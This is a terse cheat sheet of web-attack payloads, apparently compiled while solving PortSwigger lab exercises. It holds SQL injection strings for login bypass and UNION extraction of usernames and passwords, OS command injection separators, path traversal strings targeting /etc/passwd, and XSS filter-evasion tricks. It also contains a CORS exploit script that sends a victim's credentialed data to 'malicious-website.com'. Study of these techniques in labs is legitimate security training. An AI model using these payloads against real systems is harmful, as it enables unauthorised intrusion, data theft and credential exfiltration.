Burpsuit Portswigger Lab Solutions

admin'--     //Username input   
'+or+1=1--              Burp     [For + space or %20]
'+select+null,null,null --
'union+select+username,password+from+users--
'union+select+null,'Wq9f2g',1234--
'union+select+null,banner+from+v$version-- // Oracle DB
" or ""="
SELECT name, type FROM USERS WHERE name LIKE "%1"; SELECT * FROM USERS WHERE "%"="%";
'union+select+null,null||'~'||password+from+users--
@mail;ping+-c+10+127.0.0.1;                  @mail||ping+-c+10+127.0.0.1||    
../../../../
../..../..../..../
..%252F..%252F..%252Fetc/passwd

/etc/passwd

; ls  //Break's  prior command
& ls
&& ls
| ls
|| ls

'+UNION+SELECT+username,+password+FROM+users--
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
'+UNION+SELECT+@@version,+NULL#

Database type 	Query
Microsoft, MySQL 	SELECT @@version
Oracle 	SELECT * FROM v$version
PostgreSQL 	SELECT version() 

CORS

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
   location='//malicious-website.com/log?key='+this.responseText;
};

```````````````````
URL ENCODING FUNCTION
[ ] Space = %20
+ = %2B
# = %23




If SELECT is blocked, try SeLeCt
n If or 1=1-- is blocked, try or 2=2--
n If alert(‘xss’) is blocked, try prompt(‘xss’)


<script>   ---------------->  <scr<script>ipt>
..\  ---------------->   ....\

SELECT/*foo*/username,password/*foo*/FROM/*foo*/users
<img%09onerror=alert(1) src=a>

%00<script>alert(1)</script>

https://portswigger.net/web-security/sql-injection/cheat-sheet

Status Codes
n 1xx — Informational.
n 2xx — The request was successful.
n 3xx — The client is redirected to a different resource.
n 4xx — The request contains an error of some kind.
n 5xx — The server encountered an error fulfi lling the request.


Url encoding Range
ASCII code is in the range 0x20 to 0x7e,

%3d — =
n %25 — %
n %20 — Space
n %0a — New line
n %00 — Null byte

FREQ USED (space % ? & = ; + #)


Unicode Encoding  16-bit

%u2215 — /
%u00e9 — é
%e2%89%a0 — z [not equal]

HTML Encoding

&quot; — "
&apos; — '
&amp; — &
&lt; — <
&gt; — >
